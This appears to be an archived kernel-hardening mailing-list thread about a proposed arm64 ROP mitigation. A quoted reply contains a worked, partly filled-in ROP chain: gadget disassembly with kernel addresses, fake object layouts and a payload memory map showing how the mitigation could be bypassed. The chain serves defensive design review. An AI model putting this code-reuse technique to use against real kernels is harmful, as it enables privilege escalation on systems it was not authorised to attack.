Message-ID: <CAKv+Gu9qr-Rup7H=JiC+2ktfy34udnghnhnW3aB0mV=d1+x5-Q@mail.gmail.com>
Date: Mon, 13 Aug 2018 10:39:27 +0300
From: Ard Biesheuvel <ard.biesheuvel@...aro.org>
To: Mark Brand <markbrand@...gle.com>
Cc: Catalin Marinas <catalin.marinas@....com>, Christoffer Dall <christoffer.dall@....com>,
Julien Thierry <julien.thierry@....com>, Kees Cook <keescook@...omium.org>,
Kernel Hardening <kernel-hardening@...ts.openwall.com>,
Laura Abbott <labbott@...oraproject.org>, Mark Rutland <mark.rutland@....com>,
Robin Murphy <robin.murphy@....com>, Will Deacon <will.deacon@....com>,
linux-arm-kernel <linux-arm-kernel@...ts.infradead.org>
Subject: Re: [RFC/PoC PATCH 0/3] arm64: basic ROP mitigation

On Wed, 8 Aug 2018 at 19:09, Mark Brand <markbrand@...gle.com> wrote:
> On Tue, Aug 7, 2018 at 2:22 AM Ard Biesheuvel <ard.biesheuvel@...aro.org>
> wrote:
> >
> > On 7 August 2018 at 05:05, Mark Brand <markbrand@...gle.com> wrote:
> > > I think the phrasing of "limit kernel attack surface against ROP attacks"
> > > is confusing and misleading. ROP does not describe a class of bugs,
> > > vulnerabilities or attacks against the kernel - it's just one of many
> > > code-reuse techniques that can be used by an attacker while exploiting a
> > > vulnerability. But that's kind of off-topic!
> > >
> > > I think what this thread is talking about is implementing extremely
> > > coarse-grained reverse-edge control-flow-integrity, in that a return can
> > > only return to the address following a legitimate call, but it can
> > > return to any of those.
> > >
> >
> > Indeed. Apologies for not mastering the lingo, but it is indeed about
> > no longer being able to subvert function returns into jumping to
> > arbitrary places in the code.
> >
> > > I suspect there's not much benefit to this, since (as far as I can see)
> > > the assumption is that an attacker has the means to direct flow of
> > > execution as far as taking complete control of the (el1) stack before
> > > executing any ROP payload.
> > >
> > > At that point, I think it's highly unlikely an attacker needs to chain
> > > gadgets through return instructions at all - I suspect there are a few
> > > places in the kernel where it is necessary to load the entire register
> > > context from a register that is not the stack pointer, and it would
> > > likely not be more than a minor inconvenience to an attacker to use
> > > these (and chaining through branch register) instructions instead of
> > > chaining through return instructions.
> > >
> > > I'd have to take a closer look at an arm64 kernel image to be sure
> > > though - I'll do that when I get a chance and update...
> > >
> >
> > Thanks. Reloading all registers from an arbitrary offset register
> > should occur rarely, no? Could we work around that?
>
> I forgot about the gmail-html-by-default... Hopefully everyone else
> can read the quotes though :-/.
>
> I took a look and have put together an example ROP chain that doesn't
> use any return instructions you could instrument, and that will call
> an arbitrary kernel function with controlled parameters (at least x0 -
> x4; you'd probably have to mess with some alignment and add a
> repetition of the last gadget to get control of all registers). It
> assumes that the attacker has control over the memory pointed to by x0
> at the point where they get control of pc, and that they know where
> that memory is located (but it would also work if they just controlled
> the memory pointed to by x0 and had another chunk of kernel memory
> they control at a known address). That seems like a pretty reasonable
> starting assumption, and I'm sure anyone with a little motivation
> could produce similar chains for other starting conditions; this just
> seemed like the "most likely" set of reasonable conditions to me.
>
Thanks a lot for taking the time to put together this excellent example. I
will study it in more detail after I return from my vacation.
Ard.
> There are two basic principles used here -
>
> (1) chaining through the mempool_free function; I found this really
> quickly when searching for useful gadgets based off x0:
>
> void mempool_free(void *element, mempool_t *pool)
> {
>         unsigned long flags;
>
>         if (unlikely(element == NULL))
>                 return;
>
>         /* snip */
>         smp_rmb();
>
>         /* snip */
>         if (unlikely(pool->curr_nr < pool->min_nr)) {
>                 spin_lock_irqsave(&pool->lock, flags);
>                 if (likely(pool->curr_nr < pool->min_nr)) {
>                         add_element(pool, element);
>                         spin_unlock_irqrestore(&pool->lock, flags);
>                         wake_up(&pool->wait);
>                         return;
>                 }
>                 spin_unlock_irqrestore(&pool->lock, flags);
>         }
>
>         pool->free(element, pool->pool_data);
> }
>
> Since the callsites for this function usually load the arguments
> through some registers, and the function to call gets pulled out of
> one of those arguments, it's easy to get a couple of registers loaded
> here and then have the chain continue.
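>
> To make the layout concrete, here is a rough C sketch (an illustration
> of mine, not taken from the kernel sources or from the chain itself)
> of the fake "pool" object this gadget path consumes; the field offsets
> are simply read off the mempool_free disassembly further down, and the
> real definition is mempool_t in include/linux/mempool.h:
>
> /*
>  * Hypothetical attacker-controlled object passed as "pool".
>  * Choosing curr_nr >= min_nr keeps mempool_free on its fast path,
>  * so it falls straight through to pool->free(element, pool->pool_data).
>  */
> struct fake_pool {
>         unsigned int lock;      /* +0x00: not touched on the fast path */
>         int min_nr;             /* +0x04: loaded into w8               */
>         int curr_nr;            /* +0x08: loaded into w9               */
>         int pad;
>         void *elements;         /* +0x10: unused here                  */
>         void *pool_data;        /* +0x18: becomes x1 at the call       */
>         void *alloc;            /* +0x20: unused here                  */
>         void *free;             /* +0x28: target of the final blr x8   */
> };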
>
> (2) loading the complete register state using the kernel_exit macro.
>
> Since the kernel_exit macro actually loads spsr_el1 and elr_el1 from
> registers, I think that you can let the eret return to anywhere in el1
> without dropping to el0, since the same handler is used for "exiting
> the kernel" when a hardware interrupt interrupts the kernel itself. I
> didn't fill out the necessary register values in the chain below,
> since I don't have a device around to test this on right now anyway.
>
> I'm not sure that you could really robustly protect this eret; I
> suppose that you could try and somehow validate the saved register
> state, but given that it would be happening on every exception return,
> I suspect it would be expensive.
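>
> For reference, here is a hypothetical C view (again just a sketch of
> mine, with offsets read off the kernel_exit disassembly in step 5
> below) of the 0x130-byte frame that the eret gadget unwinds; the real
> layout is arm64's struct pt_regs, whose remaining fields fall into the
> part that the final "add sp, sp, #0x130" skips over:
>
> struct fake_exit_frame {
>         unsigned long regs[31]; /* x0..x30, loaded from [sp, #0x00..#0xf0] */
>         unsigned long skip[7];  /* rest of the frame, not read here        */
> };
> /* elr_el1 (the new pc) comes from x21 and spsr_el1 from x22, both set
>  * up by the earlier gadgets, and eret then jumps there at the
>  * exception level encoded in spsr_el1. */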
>
> 0:dispatch_io + yy (mempool_free gadget, appears in plenty of other places.)
> ffffff8008a340d4 084c41a9 ldp x8, x19, [x0, #0x10]
> ffffff8008a340d8 190040f9 ldr x25, [x0]
> ffffff8008a340dc 1a1040f9 ldr x26, [x0, #0x20]
> ffffff8008a340e0 010140f9 ldr x1, [x8]
> ffffff8008a340e4 ed80dd97 bl mempool_free
>
> mempool_free:
> ffffff8008194498 f44fbea9 stp x20, x19, [sp, #-0x20 {__saved_x20} {__saved_x19}]!
> ffffff800819449c fd7b01a9 stp x29, x30, [sp, #0x10 {__saved_x29} {__saved_x30}]
> ffffff80081944a0 fd430091 add x29, sp, #0x10 {__saved_x29}
> ffffff80081944a4 f30301aa mov x19, x1
> ffffff80081944a8 f40300aa mov x20, x0
> ffffff80081944ac 340100b4 cbz x20, 0xffffff80081944d0
>
> ffffff80081944b0 bf3903d5 dmb ishld
> ffffff80081944b4 68a64029 ldp w8, w9, [x19, #0x4]
> ffffff80081944b8 3f01086b cmp w9, w8
> ffffff80081944bc 0b010054 b.lt 0xffffff80081944dc
>
> ffffff80081944c0 681640f9 ldr x8, [x19, #0x28]
> ffffff80081944c4 610e40f9 ldr x1, [x19, #0x18]
> ffffff80081944c8 e00314aa mov x0, x20
> ffffff80081944cc 00013fd6 blr x8
>
> ffffff80081944d0 fd7b41a9 ldp x29, x30, [sp, #0x10 {__saved_x29} {__saved_x30}]
> ffffff80081944d4 f44fc2a8 ldp x20, x19, [sp {__saved_x20} {__saved_x19}], #0x20
> ffffff80081944d8 c0035fd6 ret
>
> ffffff8008a340e8 e00319aa mov x0, x25
> ffffff8008a340ec e1031aaa mov x1, x26
> ffffff8008a340f0 60023fd6 blr x19
>
> 1:el1_irq + xx - (x1, x26) -> sp control
> ffffff800808314c 5f030091 mov sp, x26
> ffffff8008083150 fd4fbfa9 stp x29, x19, [sp, #-0x10]! {__saved_x0}
> ffffff8008083154 fd030091 mov x29, sp
> ffffff8008083158 20003fd6 blr x1
>
> 2:ipc_log_extract + xx (sp, x19) -> survival
> ffffff800817c35c e0c30091 add x0, sp, #0x30 {var_170}
> ffffff800817c360 e1430091 add x1, sp, #0x10 {var_190}
> ffffff800817c364 60023fd6 blr x19
>
> 3:dispatch_io + xx (mempool_free gadget, appears in plenty of other places.)
> ffffff8008a342cc 084c41a9 ldp x8, x19, [x0, #0x10]
> ffffff8008a342d0 140040f9 ldr x20, [x0]
> ffffff8008a342d4 151040f9 ldr x21, [x0, #0x20]
> ffffff8008a342d8 010140f9 ldr x1, [x8]
> ffffff8008a342dc 6f80dd97 bl mempool_free
>
> mempool_free:
> ffffff8008194498 f44fbea9 stp x20, x19, [sp, #-0x20 {__saved_x20} {__saved_x19}]!
> ffffff800819449c fd7b01a9 stp x29, x30, [sp, #0x10 {__saved_x29} {__saved_x30}]
> ffffff80081944a0 fd430091 add x29, sp, #0x10 {__saved_x29}
> ffffff80081944a4 f30301aa mov x19, x1
> ffffff80081944a8 f40300aa mov x20, x0
> ffffff80081944ac 340100b4 cbz x20, 0xffffff80081944d0
>
> ffffff80081944b0 bf3903d5 dmb ishld
> ffffff80081944b4 68a64029 ldp w8, w9, [x19, #0x4]
> ffffff80081944b8 3f01086b cmp w9, w8
> ffffff80081944bc 0b010054 b.lt 0xffffff80081944dc
>
> ffffff80081944c0 681640f9 ldr x8, [x19, #0x28]
> ffffff80081944c4 610e40f9 ldr x1, [x19, #0x18]
> ffffff80081944c8 e00314aa mov x0, x20
> ffffff80081944cc 00013fd6 blr x8
>
> ffffff80081944d0 fd7b41a9 ldp x29, x30, [sp, #0x10 {__saved_x29} {__saved_x30}]
> ffffff80081944d4 f44fc2a8 ldp x20, x19, [sp {__saved_x20} {__saved_x19}], #0x20
> ffffff80081944d8 c0035fd6 ret
>
> ffffff8008a342e0 e00314aa mov x0, x20
> ffffff8008a342e4 e10315aa mov x1, x21
> ffffff8008a342e8 60023fd6 blr x19
>
> 4:bus_sort_breadthfirst + xx - (x26)
> ffffff8008683cc8 561740f9 ldr x22, [x26, #0x28]
> ffffff8008683ccc e00315aa mov x0, x21
> ffffff8008683cd0 e10316aa mov x1, x22
> ffffff8008683cd4 80023fd6 blr x20
>
> 5:kernel_exit (macro) - (x21, x22, sp) -> full register control & pc control
> ffffff8008082f64 354018d5 msr elr_el1, x21
> ffffff8008082f68 164018d5 msr spsr_el1, x22
> ffffff8008082f6c e00740a9 ldp x0, x1, [sp {var_130} {var_128}]
> ffffff8008082f70 e20f41a9 ldp x2, x3, [sp, #0x10 {var_120} {var_118}]
> ffffff8008082f74 e41742a9 ldp x4, x5, [sp, #0x20 {var_110} {var_108}]
> ffffff8008082f78 e61f43a9 ldp x6, x7, [sp, #0x30 {var_100} {var_f8}]
> ffffff8008082f7c e82744a9 ldp x8, x9, [sp, #0x40 {var_f0} {var_e8}]
> ffffff8008082f80 ea2f45a9 ldp x10, x11, [sp, #0x50 {var_e0} {var_d8}]
> ffffff8008082f84 ec3746a9 ldp x12, x13, [sp, #0x60 {var_d0} {var_c8}]
> ffffff8008082f88 ee3f47a9 ldp x14, x15, [sp, #0x70 {var_c0} {var_b8}]
> ffffff8008082f8c f04748a9 ldp x16, x17, [sp, #0x80 {var_b0} {var_a8}]
> ffffff8008082f90 f24f49a9 ldp x18, x19, [sp, #0x90 {var_a0} {var_98}]
> ffffff8008082f94 f4574aa9 ldp x20, x21, [sp, #0xa0 {var_90} {var_88}]
> ffffff8008082f98 f65f4ba9 ldp x22, x23, [sp, #0xb0 {var_80} {var_78}]
> ffffff8008082f9c f8674ca9 ldp x24, x25, [sp, #0xc0 {var_70} {var_68}]
> ffffff8008082fa0 fa6f4da9 ldp x26, x27, [sp, #0xd0 {var_60} {var_58}]
> ffffff8008082fa4 fc774ea9 ldp x28, x29, [sp, #0xe0 {var_50} {var_48}]
> ffffff8008082fa8 fe7b40f9 ldr x30, [sp, #0xf0 {var_40}]
> ffffff8008082fac ffc30491 add sp, sp, #0x130
> ffffff8008082fb0 e0039fd6 eret
>
>
> ptr = 0000414100000000 = initial x0
>
> 0000: 2525252525252525 ; (0:40d8) x25
> 0008: 0000414100000030 ; (0:40e0) x1
> 0010: 0000414100000000 ; (0:40d4) x8
> 0018: ffffff8008a342cc ; (0:40d4) x19 -> branch target (2:c364)
> 0020: 0000414100000070 ; (0:40dc) x26 -> sp (1:314c)
> 0028:
> 0030: 8888888899999999 ; (0:44b4) w8, w9
> 0038:
> 0040:
> 0048: ffffff800817c35c ; (0:44c4) x1 -> branch target (1:3158)
> 0050:
> 0058: ffffff800808314c ; (0:44c0) x8 -> branch target (0:44c4)
> 0060: xxxxxxxxxxxxxxxx ; saved x29 <-- sp@(1:3154)
> 0068: xxxxxxxxxxxxxxxx ; saved x19
> 0070:                  ; <-- sp@(1:314c), (5:2f64)
> 0078:
> 0080:
> 0088:
> 0090:
> 0098: 2222222222222222 ; (4:3cc8) x22 -> spsr_el1
> 00a0: ffffff8008082f64 ; (3:42d0) x20 -> branch target (4:3cd4) <-- x0@(2:c35c)
> 00a8: 00004141000000d0 ; (3:42d8) x1
> 00b0: 00004141000000a0 ; (3:42cc) x8
> 00b8: 1919191919191919 ; (3:42cc) x19
> 00c0: 2121212121212121 ; (3:42d4) x21 -> elr_el1
> 00c8:
> 00d0: 8888888899999999 ; (3:44b4) w8, w9
> 00d8:
> 00e0:
> 00e8: 1111111111111111 ; (3:44c4) x1
> 00f0:
> 00f8: ffffff800808314c ; (3:44c0) x8 -> branch target (3:44c4)
> >
> > > On Mon, 6 Aug 2018 at 19:28, Ard Biesheuvel <ard.biesheuvel@...aro.org>
> > > wrote:
> > >>
> > >> On 6 August 2018 at 21:50, Kees Cook <keescook@...omium.org> wrote:
> > >> > On Mon, Aug 6, 2018 at 12:35 PM, Ard Biesheuvel
> > >> > <ard.biesheuvel@...aro.org> wrote:
> > >> >> On 6 August 2018 at 20:49, Kees Cook <keescook@...omium.org> wrote:
> > >> >>> On Mon, Aug 6, 2018 at 10:45 AM, Robin Murphy <robin.murphy@....com>
> > >> >>> wrote:
> > >> >>>> I guess what I'm getting at is that if the protection mechanism is
> > >> >>>> "always return with SP outside TTBR1", there seems little point in
> > >> >>>> going through the motions if SP in TTBR0 could still be valid and
> > >> >>>> allow an attack to succeed anyway; this is basically just me
> > >> >>>> working through a justification for saying the proposed scheme
> > >> >>>> needs "depends on ARM64_PAN || ARM64_SW_TTBR0_PAN", making it that
> > >> >>>> much uglier for v8.0 CPUs...
> > >> >>>
> > >> >>> I think anyone with v8.0 CPUs interested in this mitigation would
> > >> >>> also very much want PAN emulation. If a "depends on" isn't desired,
> > >> >>> what about "imply" in the Kconfig?
> > >> >>>
> > >> >>
> > >> >> Yes, but actually, using bit #0 is maybe a better alternative in any
> > >> >> case. You can never dereference SP with bit #0 set, regardless of
> > >> >> whether the address points to user or kernel space, and my concern
> > >> >> about reloading sp from x29 doesn't really make sense, given that x29
> > >> >> is always assigned from sp right after pushing x29 and x30 in the
> > >> >> function prologue, and sp only gets restored from x29 in the epilogue
> > >> >> when there is a stack frame to begin with, in which case we add #1 to
> > >> >> sp again before returning from the function.
> > >> >
> > >> > Fair enough! :)
> > >> >
> > >> >> The other code gets a lot cleaner as well.
> > >> >>
> > >> >> So for the return we'll have
> > >> >>
> > >> >> ldp x29, x30, [sp], #nn
> > >> >>>>add sp, sp, #0x1
> > >> >> ret
> > >> >>
> > >> >> and for the function call
> > >> >>
> > >> >> bl <foo>
> > >> >>>>mov x30, sp
> > >> >>>>bic sp, x30, #1
> > >> >>
> > >> >> The restore sequence in entry.S:96 (which has no spare registers)
> > >> >> gets much simpler as well:
> > >> >>
> > >> >> --- a/arch/arm64/kernel/entry.S
> > >> >> +++ b/arch/arm64/kernel/entry.S
> > >> >> @@ -95,6 +95,15 @@ alternative_else_nop_endif
> > >> >> */
> > >> >> add sp, sp, x0 // sp' = sp + x0
> > >> >> sub x0, sp, x0 // x0' = sp' - x0 = (sp + x0) - x0 = sp
> > >> >> +#ifdef CONFIG_ARM64_ROP_SHIELD
> > >> >> + tbnz x0, #0, 1f
> > >> >> + .subsection 1
> > >> >> +1: sub x0, x0, #1
> > >> >> + sub sp, sp, #1
> > >> >> + b 2f
> > >> >> + .previous
> > >> >> +2:
> > >> >> +#endif
> > >> >> tbnz x0, #THREAD_SHIFT, 0f
> > >> >> sub x0, sp, x0 // x0'' = sp' - x0' = (sp + x0) - sp = x0
> > >> >> sub sp, sp, x0 // sp'' = sp' - x0 = (sp + x0) - x0 = sp
> > >> >
> > >> > I get slightly concerned about "add" vs "clear bit", but I don't see
> > >> > a real way to chain a lot of "add"s to get to avoid the unaligned
> > >> > access. Is "or" less efficient than "add"?
> > >> >
> > >>
> > >> Yes. The stack pointer is special on arm64, and can only be used with
> > >> a limited set of ALU instructions. So orring #1 would involve 'mov
> > >> <reg>, sp ; orr sp, <reg>, #1' like in the 'bic' case above, which
> > >> requires a scratch register as well.
>